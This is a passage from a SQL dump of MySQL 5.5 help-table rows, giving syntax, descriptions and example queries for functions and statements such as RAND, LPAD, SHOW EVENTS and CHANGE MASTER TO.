AND \'3\';\n -> 1\nmysql> SELECT 2 BETWEEN 2 AND \'x-3\';\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(148,'MULTIPOLYGON',25,'MultiPolygon(poly1,poly2,...)\n\nConstructs a MultiPolygon value from a set of Polygon or WKB Polygon\narguments.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-mysql-specific-functions.html'),(149,'TIME_FORMAT',32,'Syntax:\nTIME_FORMAT(time,format)\n\nThis is used like the DATE_FORMAT() function, but the format string may\ncontain format specifiers only for hours, minutes, seconds, and\nmicroseconds. Other specifiers produce a NULL value or 0.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT TIME_FORMAT(\'100:00:00\', \'%H %k %h %I %l\');\n -> \'100 100 04 04 4\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(150,'LEFT',38,'Syntax:\nLEFT(str,len)\n\nReturns the leftmost len characters from the string str, or NULL if any\nargument is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT LEFT(\'foobarbar\', 5);\n -> \'fooba\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(151,'FLUSH QUERY CACHE',27,'You can defragment the query cache to better utilize its memory with\nthe FLUSH QUERY CACHE statement. The statement does not remove any\nqueries from the cache.\n\nThe RESET QUERY CACHE statement removes all query results from the\nquery cache. The FLUSH TABLES statement also does this.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/query-cache-status-and-maintenance.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/query-cache-status-and-maintenance.html'),(152,'SET DATA TYPE',23,'SET(\'value1\',\'value2\',...) [CHARACTER SET charset_name] [COLLATE\ncollation_name]\n\nA set. A string object that can have zero or more values, each of which\nmust be chosen from the list of values \'value1\', \'value2\', ... SET\nvalues are represented internally as integers.\n\nA SET column can have a maximum of 64 distinct members. A table can\nhave no more than 255 unique element list definitions among its ENUM\nand SET columns considered as a group. For more information on this\nlimit, see http://dev.mysql.com/doc/refman/5.5/en/limits-frm-file.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(153,'RAND',3,'Syntax:\nRAND(), RAND(N)\n\nReturns a random floating-point value v in the range 0 <= v < 1.0. If a\nconstant integer argument N is specified, it is used as the seed value,\nwhich produces a repeatable sequence of column values. In the following\nexample, note that the sequences of values produced by RAND(3) is the\nsame both places where it occurs.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> CREATE TABLE t (i INT);\nQuery OK, 0 rows affected (0.42 sec)\n\nmysql> INSERT INTO t VALUES(1),(2),(3);\nQuery OK, 3 rows affected (0.00 sec)\nRecords: 3 Duplicates: 0 Warnings: 0\n\nmysql> SELECT i, RAND() FROM t;\n+------+------------------+\n| i | RAND() |\n+------+------------------+\n| 1 | 0.61914388706828 |\n| 2 | 0.93845168309142 |\n| 3 | 0.83482678498591 |\n+------+------------------+\n3 rows in set (0.00 sec)\n\nmysql> SELECT i, RAND(3) FROM t;\n+------+------------------+\n| i | RAND(3) |\n+------+------------------+\n| 1 | 0.90576975597606 |\n| 2 | 0.37307905813035 |\n| 3 | 0.14808605345719 |\n+------+------------------+\n3 rows in set (0.00 sec)\n\nmysql> SELECT i, RAND() FROM t;\n+------+------------------+\n| i | RAND() |\n+------+------------------+\n| 1 | 0.35877890638893 |\n| 2 | 0.28941420772058 |\n| 3 | 0.37073435016976 |\n+------+------------------+\n3 rows in set (0.00 sec)\n\nmysql> SELECT i, RAND(3) FROM t;\n+------+------------------+\n| i | RAND(3) |\n+------+------------------+\n| 1 | 0.90576975597606 |\n| 2 | 0.37307905813035 |\n| 3 | 0.14808605345719 |\n+------+------------------+\n3 rows in set (0.01 sec)\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(154,'RPAD',38,'Syntax:\nRPAD(str,len,padstr)\n\nReturns the string str, right-padded with the string padstr to a length\nof len characters. If str is longer than len, the return value is\nshortened to len characters.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT RPAD(\'hi\',5,\'?\');\n -> \'hi???\'\nmysql> SELECT RPAD(\'hi\',1,\'?\');\n -> \'h\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(155,'CREATE DATABASE',40,'Syntax:\nCREATE {DATABASE | SCHEMA} [IF NOT EXISTS] db_name\n [create_specification] ...\n\ncreate_specification:\n [DEFAULT] CHARACTER SET [=] charset_name\n | [DEFAULT] COLLATE [=] collation_name\n\nCREATE DATABASE creates a database with the given name. To use this\nstatement, you need the CREATE privilege for the database. CREATE\nSCHEMA is a synonym for CREATE DATABASE.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-database.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-database.html'),(156,'DEC',23,'DEC[(M[,D])] [UNSIGNED] [ZEROFILL], NUMERIC[(M[,D])] [UNSIGNED]\n[ZEROFILL], FIXED[(M[,D])] [UNSIGNED] [ZEROFILL]\n\nThese types are synonyms for DECIMAL. The FIXED synonym is available\nfor compatibility with other database systems.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(157,'VAR_POP',16,'Syntax:\nVAR_POP(expr)\n\nReturns the population standard variance of expr. It considers rows as\nthe whole population, not as a sample, so it has the number of rows as\nthe denominator. You can also use VARIANCE(), which is equivalent but\nis not standard SQL.\n\nVAR_POP() returns NULL if there were no matching rows.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/group-by-functions.html'),(158,'ELT',38,'Syntax:\nELT(N,str1,str2,str3,...)\n\nELT() returns the Nth element of the list of strings: str1 if N = 1,\nstr2 if N = 2, and so on. Returns NULL if N is less than 1 or greater\nthan the number of arguments. ELT() is the complement of FIELD().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT ELT(1, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'ej\'\nmysql> SELECT ELT(4, \'ej\', \'Heja\', \'hej\', \'foo\');\n -> \'foo\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(159,'ALTER VIEW',40,'Syntax:\nALTER\n [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n [DEFINER = { user | CURRENT_USER }]\n [SQL SECURITY { DEFINER | INVOKER }]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]\n\nThis statement changes the definition of a view, which must exist. The\nsyntax is similar to that for CREATE VIEW and the effect is the same as\nfor CREATE OR REPLACE VIEW. See [HELP CREATE VIEW]. This statement\nrequires the CREATE VIEW and DROP privileges for the view, and some\nprivilege for each column referred to in the SELECT statement. ALTER\nVIEW is permitted only to the definer or users with the SUPER\nprivilege.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-view.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/alter-view.html'),(160,'SHOW DATABASES',27,'Syntax:\nSHOW {DATABASES | SCHEMAS}\n [LIKE \'pattern\' | WHERE expr]\n\nSHOW DATABASES lists the databases on the MySQL server host. SHOW\nSCHEMAS is a synonym for SHOW DATABASES. The LIKE clause, if present,\nindicates which database names to match. The WHERE clause can be given\nto select rows using more general conditions, as discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nYou see only those databases for which you have some kind of privilege,\nunless you have the global SHOW DATABASES privilege. You can also get\nthis list using the mysqlshow command.\n\nIf the server was started with the --skip-show-database option, you\ncannot use this statement at all unless you have the SHOW DATABASES\nprivilege.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-databases.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-databases.html'),(161,'~',19,'Syntax:\n~\n\nInvert all bits.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html\n\n','mysql> SELECT 5 & ~1;\n -> 4\n','http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html'),(162,'TEXT',23,'TEXT[(M)] [CHARACTER SET charset_name] [COLLATE collation_name]\n\nA TEXT column with a maximum length of 65,535 (216 − 1) characters.\nThe effective maximum length is less if the value contains multibyte\ncharacters. Each TEXT value is stored using a 2-byte length prefix that\nindicates the number of bytes in the value.\n\nAn optional length M can be given for this type. If this is done, MySQL\ncreates the column as the smallest TEXT type large enough to hold\nvalues M characters long.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(163,'CONCAT_WS',38,'Syntax:\nCONCAT_WS(separator,str1,str2,...)\n\nCONCAT_WS() stands for Concatenate With Separator and is a special form\nof CONCAT(). The first argument is the separator for the rest of the\narguments. The separator is added between the strings to be\nconcatenated. The separator can be a string, as can the rest of the\narguments. If the separator is NULL, the result is NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT CONCAT_WS(\',\',\'First name\',\'Second name\',\'Last Name\');\n -> \'First name,Second name,Last Name\'\nmysql> SELECT CONCAT_WS(\',\',\'First name\',NULL,\'Last Name\');\n -> \'First name,Last Name\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(164,'ROW_COUNT',17,'Syntax:\nROW_COUNT()\n\nBefore MySQL 5.5.5, ROW_COUNT() returns the number of rows changed,\ndeleted, or inserted by the last statement if it was an UPDATE, DELETE,\nor INSERT. For other statements, the value may not be meaningful.\n\nAs of MySQL 5.5.5, ROW_COUNT() returns a value as follows:\n\no DDL statements: 0. This applies to statements such as CREATE TABLE or\n DROP TABLE.\n\no DML statements other than SELECT: The number of affected rows. This\n applies to statements such as UPDATE, INSERT, or DELETE (as before),\n but now also to statements such as ALTER TABLE and LOAD DATA INFILE.\n\no SELECT: -1 if the statement returns a result set, or the number of\n rows \"affected\" if it does not. For example, for SELECT * FROM t1,\n ROW_COUNT() returns -1. For SELECT * FROM t1 INTO OUTFILE\n \'file_name\', ROW_COUNT() returns the number of rows written to the\n file.\n\no SIGNAL statements: 0.\n\nFor UPDATE statements, the affected-rows value by default is the number\nof rows actually changed. If you specify the CLIENT_FOUND_ROWS flag to\nmysql_real_connect() when connecting to mysqld, the affected-rows value\nis the number of rows \"found\"; that is, matched by the WHERE clause.\n\nFor REPLACE statements, the affected-rows value is 2 if the new row\nreplaced an old row, because in this case, one row was inserted after\nthe duplicate was deleted.\n\nFor INSERT ... ON DUPLICATE KEY UPDATE statements, the affected-rows\nvalue per row is 1 if the row is inserted as a new row, 2 if an\nexisting row is updated, and 0 if an existing row is set to its current\nvalues. If you specify the CLIENT_FOUND_ROWS flag, the affected-rows\nvalue is 1 (not 0) if an existing row is set to its current values.\n\nThe ROW_COUNT() value is similar to the value from the\nmysql_affected_rows() C API function and the row count that the mysql\nclient displays following statement execution.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> INSERT INTO t VALUES(1),(2),(3);\nQuery OK, 3 rows affected (0.00 sec)\nRecords: 3 Duplicates: 0 Warnings: 0\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 3 |\n+-------------+\n1 row in set (0.00 sec)\n\nmysql> DELETE FROM t WHERE i IN(1,2);\nQuery OK, 2 rows affected (0.00 sec)\n\nmysql> SELECT ROW_COUNT();\n+-------------+\n| ROW_COUNT() |\n+-------------+\n| 2 |\n+-------------+\n1 row in set (0.00 sec)\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(165,'ASIN',3,'Syntax:\nASIN(X)\n\nReturns the arc sine of X, that is, the value whose sine is X. Returns\nNULL if X is not in the range -1 to 1.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT ASIN(0.2);\n -> 0.20135792079033\nmysql> SELECT ASIN(\'foo\');\n\n+-------------+\n| ASIN(\'foo\') |\n+-------------+\n| 0 |\n+-------------+\n1 row in set, 1 warning (0.00 sec)\n\nmysql> SHOW WARNINGS;\n+---------+------+-----------------------------------------+\n| Level | Code | Message |\n+---------+------+-----------------------------------------+\n| Warning | 1292 | Truncated incorrect DOUBLE value: \'foo\' |\n+---------+------+-----------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(166,'SIGN',3,'Syntax:\nSIGN(X)\n\nReturns the sign of the argument as -1, 0, or 1, depending on whether X\nis negative, zero, or positive.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT SIGN(-32);\n -> -1\nmysql> SELECT SIGN(0);\n -> 0\nmysql> SELECT SIGN(234);\n -> 1\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(167,'SEC_TO_TIME',32,'Syntax:\nSEC_TO_TIME(seconds)\n\nReturns the seconds argument, converted to hours, minutes, and seconds,\nas a TIME value. The range of the result is constrained to that of the\nTIME data type. A warning occurs if the argument corresponds to a value\noutside that range.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT SEC_TO_TIME(2378);\n -> \'00:39:38\'\nmysql> SELECT SEC_TO_TIME(2378) + 0;\n -> 3938\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(168,'FLOAT',23,'FLOAT[(M,D)] [UNSIGNED] [ZEROFILL]\n\nA small (single-precision) floating-point number. Permissible values\nare -3.402823466E+38 to -1.175494351E-38, 0, and 1.175494351E-38 to\n3.402823466E+38. These are the theoretical limits, based on the IEEE\nstandard. The actual range might be slightly smaller depending on your\nhardware or operating system.\n\nM is the total number of digits and D is the number of digits following\nthe decimal point. If M and D are omitted, values are stored to the\nlimits permitted by the hardware. A single-precision floating-point\nnumber is accurate to approximately 7 decimal places.\n\nUNSIGNED, if specified, disallows negative values.\n\nUsing FLOAT might give you some unexpected problems because all\ncalculations in MySQL are done with double precision. See\nhttp://dev.mysql.com/doc/refman/5.5/en/no-matching-rows.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(169,'LOCATE',38,'Syntax:\nLOCATE(substr,str), LOCATE(substr,str,pos)\n\nThe first syntax returns the position of the first occurrence of\nsubstring substr in string str. The second syntax returns the position\nof the first occurrence of substring substr in string str, starting at\nposition pos. Returns 0 if substr is not in str.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT LOCATE(\'bar\', \'foobarbar\');\n -> 4\nmysql> SELECT LOCATE(\'xbar\', \'foobar\');\n -> 0\nmysql> SELECT LOCATE(\'bar\', \'foobarbar\', 5);\n -> 7\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(170,'SHOW EVENTS',27,'Syntax:\nSHOW EVENTS [{FROM | IN} schema_name]\n [LIKE \'pattern\' | WHERE expr]\n\nThis statement displays information about Event Manager events. It\nrequires the EVENT privilege for the database from which the events are\nto be shown.\n\nIn its simplest form, SHOW EVENTS lists all of the events in the\ncurrent schema:\n\nmysql> SELECT CURRENT_USER(), SCHEMA();\n+----------------+----------+\n| CURRENT_USER() | SCHEMA() |\n+----------------+----------+\n| jon@ghidora | myschema |\n+----------------+----------+\n1 row in set (0.00 sec)\n\nmysql> SHOW EVENTS\\G\n*************************** 1. row ***************************\n Db: myschema\n Name: e_daily\n Definer: jon@ghidora\n Time zone: SYSTEM\n Type: RECURRING\n Execute at: NULL\n Interval value: 10\n Interval field: SECOND\n Starts: 2006-02-09 10:41:23\n Ends: NULL\n Status: ENABLED\n Originator: 0\ncharacter_set_client: latin1\ncollation_connection: latin1_swedish_ci\n Database Collation: latin1_swedish_ci\n\nTo see events for a specific schema, use the FROM clause. For example,\nto see events for the test schema, use the following statement:\n\nSHOW EVENTS FROM test;\n\nThe LIKE clause, if present, indicates which event names to match. The\nWHERE clause can be given to select rows using more general conditions,\nas discussed in\nhttp://dev.mysql.com/doc/refman/5.5/en/extended-show.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-events.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-events.html'),(171,'CHARSET',17,'Syntax:\nCHARSET(str)\n\nReturns the character set of the string argument.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT CHARSET(\'abc\');\n -> \'latin1\'\nmysql> SELECT CHARSET(CONVERT(\'abc\' USING utf8));\n -> \'utf8\'\nmysql> SELECT CHARSET(USER());\n -> \'utf8\'\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(172,'SUBDATE',32,'Syntax:\nSUBDATE(date,INTERVAL expr unit), SUBDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument, SUBDATE()\nis a synonym for DATE_SUB(). For information on the INTERVAL unit\nargument, see the discussion for DATE_ADD().\n\nmysql> SELECT DATE_SUB(\'2008-01-02\', INTERVAL 31 DAY);\n -> \'2007-12-02\'\nmysql> SELECT SUBDATE(\'2008-01-02\', INTERVAL 31 DAY);\n -> \'2007-12-02\'\n\nThe second form enables the use of an integer value for days. In such\ncases, it is interpreted as the number of days to be subtracted from\nthe date or datetime expression expr.\n\nmysql> SELECT SUBDATE(\'2008-01-02 12:00:00\', 31);\n -> \'2007-12-02 12:00:00\'\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(173,'DAYOFYEAR',32,'Syntax:\nDAYOFYEAR(date)\n\nReturns the day of the year for date, in the range 1 to 366.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT DAYOFYEAR(\'2007-02-03\');\n -> 34\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(174,'%',3,'Syntax:\nN % M, N MOD M\n\nModulo operation. Returns the remainder of N divided by M. For more\ninformation, see the description for the MOD() function in\nhttp://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html'),(175,'LONGTEXT',23,'LONGTEXT [CHARACTER SET charset_name] [COLLATE collation_name]\n\nA TEXT column with a maximum length of 4,294,967,295 or 4GB (232 − 1)\ncharacters. The effective maximum length is less if the value contains\nmultibyte characters. The effective maximum length of LONGTEXT columns\nalso depends on the configured maximum packet size in the client/server\nprotocol and available memory. Each LONGTEXT value is stored using a\n4-byte length prefix that indicates the number of bytes in the value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(176,'KILL',27,'Syntax:\nKILL [CONNECTION | QUERY] processlist_id\n\nEach connection to mysqld runs in a separate thread. You can kill a\nthread with the KILL processlist_id statement.\n\nThread processlist identifiers can be determined from the ID column of\nthe INFORMATION_SCHEMA.PROCESSLIST table, the Id column of SHOW\nPROCESSLIST output, and the PROCESSLIST_ID column of the Performance\nSchema threads table. The value for the current thread is returned by\nthe CONNECTION_ID() function.\n\nKILL permits an optional CONNECTION or QUERY modifier:\n\no KILL CONNECTION is the same as KILL with no modifier: It terminates\n the connection associated with the given processlist_id, after\n terminating any statement the connection is executing.\n\no KILL QUERY terminates the statement the connection is currently\n executing, but leaves the connection itself intact.\n\nIf you have the PROCESS privilege, you can see all threads. If you have\nthe SUPER privilege, you can kill all threads and statements.\nOtherwise, you can see and kill only your own threads and statements.\n\nYou can also use the mysqladmin processlist and mysqladmin kill\ncommands to examine and kill threads.\n\n*Note*: You cannot use KILL with the Embedded MySQL Server library\nbecause the embedded server merely runs inside the threads of the host\napplication. It does not create any connection threads of its own.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/kill.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/kill.html'),(177,'DISJOINT',31,'Disjoint(g1,g2)\n\nReturns 1 or 0 to indicate whether g1 is spatially disjoint from (does\nnot intersect) g2.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html'),(178,'ASTEXT',33,'AsText(g), AsWKT(g)\n\nConverts a value in internal geometry format to its WKT representation\nand returns the string result.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-format-conversion-functions.html\n\n','mysql> SET @g = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(GeomFromText(@g));\n+--------------------------+\n| AsText(GeomFromText(@g)) |\n+--------------------------+\n| LINESTRING(1 1,2 2,3 3) |\n+--------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-format-conversion-functions.html'),(179,'LPAD',38,'Syntax:\nLPAD(str,len,padstr)\n\nReturns the string str, left-padded with the string padstr to a length\nof len characters. If str is longer than len, the return value is\nshortened to len characters.\n\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT LPAD(\'hi\',4,\'??\');\n -> \'??hi\'\nmysql> SELECT LPAD(\'hi\',1,\'??\');\n -> \'h\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(180,'DECLARE CONDITION',24,'Syntax:\nDECLARE condition_name CONDITION FOR condition_value\n\ncondition_value:\n mysql_error_code\n | SQLSTATE [VALUE] sqlstate_value\n\nThe DECLARE ... CONDITION statement declares a named error condition,\nassociating a name with a condition that needs specific handling. The\nname can be referred to in a subsequent DECLARE ... HANDLER statement\n(see [HELP DECLARE HANDLER]).\n\nCondition declarations must appear before cursor or handler\ndeclarations.\n\nThe condition_value for DECLARE ... CONDITION can be a MySQL error code\n(a number) or an SQLSTATE value (a 5-character string literal). You\nshould not use MySQL error code 0 or SQLSTATE values that begin with\n\'00\', because those indicate success rather than an error condition.\nFor a list of MySQL error codes and SQLSTATE values, see\nhttp://dev.mysql.com/doc/refman/5.5/en/error-messages-server.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/declare-condition.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/declare-condition.html'),(181,'OVERLAPS',31,'Overlaps(g1,g2)\n\nReturns 1 or 0 to indicate whether g1 spatially overlaps g2. The term\nspatially overlaps is used if two geometries intersect and their\nintersection results in a geometry of the same dimension but not equal\nto either of the given geometries.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-mbr.html'),(182,'SET GLOBAL SQL_SLAVE_SKIP_COUNTER',8,'Syntax:\nSET GLOBAL sql_slave_skip_counter = N\n\nThis statement skips the next N events from the master. This is useful\nfor recovering from replication stops caused by a statement.\n\nThis statement is valid only when the slave threads are not running.\nOtherwise, it produces an error.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/set-global-sql-slave-skip-counter.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/set-global-sql-slave-skip-counter.html'),(183,'NUMGEOMETRIES',26,'NumGeometries(gc)\n\nReturns the number of geometries in the GeometryCollection value gc.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-geometrycollection-property-functions.html\n\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT NumGeometries(GeomFromText(@gc));\n+----------------------------------+\n| NumGeometries(GeomFromText(@gc)) |\n+----------------------------------+\n| 2 |\n+----------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-geometrycollection-property-functions.html'),(184,'MONTHNAME',32,'Syntax:\nMONTHNAME(date)\n\nReturns the full name of the month for date. The language used for the\nname is controlled by the value of the lc_time_names system variable\n(http://dev.mysql.com/doc/refman/5.5/en/locale-support.html).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT MONTHNAME(\'2008-02-03\');\n -> \'February\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(185,'CHANGE MASTER TO',8,'Syntax:\nCHANGE MASTER TO option [, option] ...\n\noption:\n MASTER_BIND = \'interface_name\'\n | MASTER_HOST = \'host_name\'\n | MASTER_USER = \'user_name\'\n | MASTER_PASSWORD = \'password\'\n | MASTER_PORT = port_num\n | MASTER_CONNECT_RETRY = interval\n | MASTER_HEARTBEAT_PERIOD = interval\n | MASTER_LOG_FILE = \'master_log_name\'\n | MASTER_LOG_POS = master_log_pos\n | RELAY_LOG_FILE = \'relay_log_name\'\n | RELAY_LOG_POS = relay_log_pos\n | MASTER_SSL = {0|1}\n | MASTER_SSL_CA = \'ca_file_name\'\n | MASTER_SSL_CAPATH = \'ca_directory_name\'\n | MASTER_SSL_CERT = \'cert_file_name\'\n | MASTER_SSL_KEY = \'key_file_name\'\n | MASTER_SSL_CIPHER = \'cipher_list\'\n | MASTER_SSL_VERIFY_SERVER_CERT = {0|1}\n | IGNORE_SERVER_IDS = (server_id_list)\n\nserver_id_list:\n [server_id [, server_id] ... ]\n\nCHANGE MASTER TO changes the parameters that the slave server uses for\nconnecting to the master server, for reading the master binary log, and\nreading the slave relay log. It also updates the contents of the\nmaster.info and relay-log.info files. To use CHANGE MASTER TO, the\nslave replication threads must be stopped (use STOP SLAVE if\nnecessary).\n\nOptions not specified retain their value, except as indicated in the\nfollowing discussion. Thus, in most cases, there is no need to specify\noptions that do not change. For example, if the password to connect to\nyour MySQL master has changed, you just need to issue these statements\nto tell the slave about the new password:\n\nSTOP SLAVE; -- if replication was running\nCHANGE MASTER TO MASTER_PASSWORD=\'new3cret\';\nSTART SLAVE; -- if you want to restart replication\n\nMASTER_HOST, MASTER_USER, MASTER_PASSWORD, and MASTER_PORT provide\ninformation to the slave about how to connect to its master:\n\no MASTER_HOST and MASTER_PORT are the host name (or IP address) of the\n master host and its TCP/IP port.\n\n *Note*: Replication cannot use Unix socket files. You must be able to\n connect to the master MySQL server using TCP/IP.\n\n If you specify the MASTER_HOST or MASTER_PORT option, the slave\n assumes that the master server is different from before (even if the\n option value is the same as its current value.) In this case, the old\n values for the master binary log file name and position are\n considered no longer applicable, so if you do not specify\n MASTER_LOG_FILE and MASTER_LOG_POS in the statement,\n MASTER_LOG_FILE=\'\' and MASTER_LOG_POS=4 are silently appended to it.\n\n Setting MASTER_HOST=\'\' (that is, setting its value explicitly to an\n empty string) is not the same as not setting MASTER_HOST at all.\n Beginning with MySQL 5.5, trying to set MASTER_HOST to an empty\n string fails with an error. Previously, setting MASTER_HOST to an\n empty string caused START SLAVE subsequently to fail. (Bug #28796)\n\no MASTER_USER and MASTER_PASSWORD are the user name and password of the\n account to use for connecting to the master.\n\n In MySQL 5.5.20 and later, MASTER_USER cannot be made empty; setting\n MASTER_USER = \'\' or leaving it unset when setting a value for\n MASTER_PASSWORD causes an error (Bug #13427949).\n\n The password used for a MySQL Replication slave account in a CHANGE\n MASTER TO statement is limited to 32 characters in length; if the\n password is longer, the statement succeeds, but any excess characters\n are silently truncated. This is an issue specific to MySQL\n Replication, which is fixed in MySQL 5.7. (Bug #11752299, Bug #43439)\n\n The text of a running CHANGE MASTER TO statement, including values\n for MASTER_USER and MASTER_PASSWORD, can be seen in the output of a\n concurrent SHOW PROCESSLIST statement.\n\nThe MASTER_SSL_xxx options provide information about using SSL for the\nconnection. They correspond to the --ssl-xxx options described in\nhttp://dev.mysql.com/doc/refman/5.5/en/ssl-options.html, and\nhttp://dev.mysql.com/doc/refman/5.5/en/replication-solutions-ssl.html.\nThese options can be changed even on slaves that are compiled without\nSSL support. They are saved to the master.info file, but are ignored if\nthe slave does not have SSL support enabled.\n\nMASTER_CONNECT_RETRY specifies how many seconds to wait between connect\nretries. The default is 60. The number of reconnection attempts is\nlimited by the --master-retry-count server option; for more\ninformation, see\nhttp://dev.mysql.com/doc/refman/5.5/en/replication-options.html.\n\nThe MASTER_BIND option is available in MySQL Cluster NDB 7.2 and later,\nbut is not supported in mainline MySQL 5.5.\n\nMASTER_BIND is for use on replication slaves having multiple network\ninterfaces, and determines which of the slave\'s network interfaces is\nchosen for connecting to the master.\n\nMASTER_HEARTBEAT_PERIOD sets the interval in seconds between\nreplication heartbeats. Whenever the master\'s binary log is updated\nwith an event, the waiting period for the next heartbeat is reset.\ninterval is a decimal value having the range 0 to 4294967 seconds and a\nresolution in milliseconds; the smallest nonzero value is 0.001.\nHeartbeats are sent by the master only if there are no unsent events in\nthe binary log file for a period longer than interval.\n\nSetting interval to 0 disables heartbeats altogether. The default value\nfor interval is equal to the value of slave_net_timeout divided by 2.\n\nSetting @@global.slave_net_timeout to a value less than that of the\ncurrent heartbeat interval results in a warning being issued. The\neffect of issuing RESET SLAVE on the heartbeat interval is to reset it\nto the default value.\n\nMASTER_LOG_FILE and MASTER_LOG_POS are the coordinates at which the\nslave I/O thread should begin reading from the master the next time the\nthread starts. RELAY_LOG_FILE and RELAY_LOG_POS are the coordinates at\nwhich the slave SQL thread should begin reading from the relay log the\nnext time the thread starts. If you specify either of MASTER_LOG_FILE\nor MASTER_LOG_POS, you cannot specify RELAY_LOG_FILE or RELAY_LOG_POS.\nIf neither of MASTER_LOG_FILE or MASTER_LOG_POS is specified, the slave\nuses the last coordinates of the slave SQL thread before CHANGE MASTER\nTO was issued. This 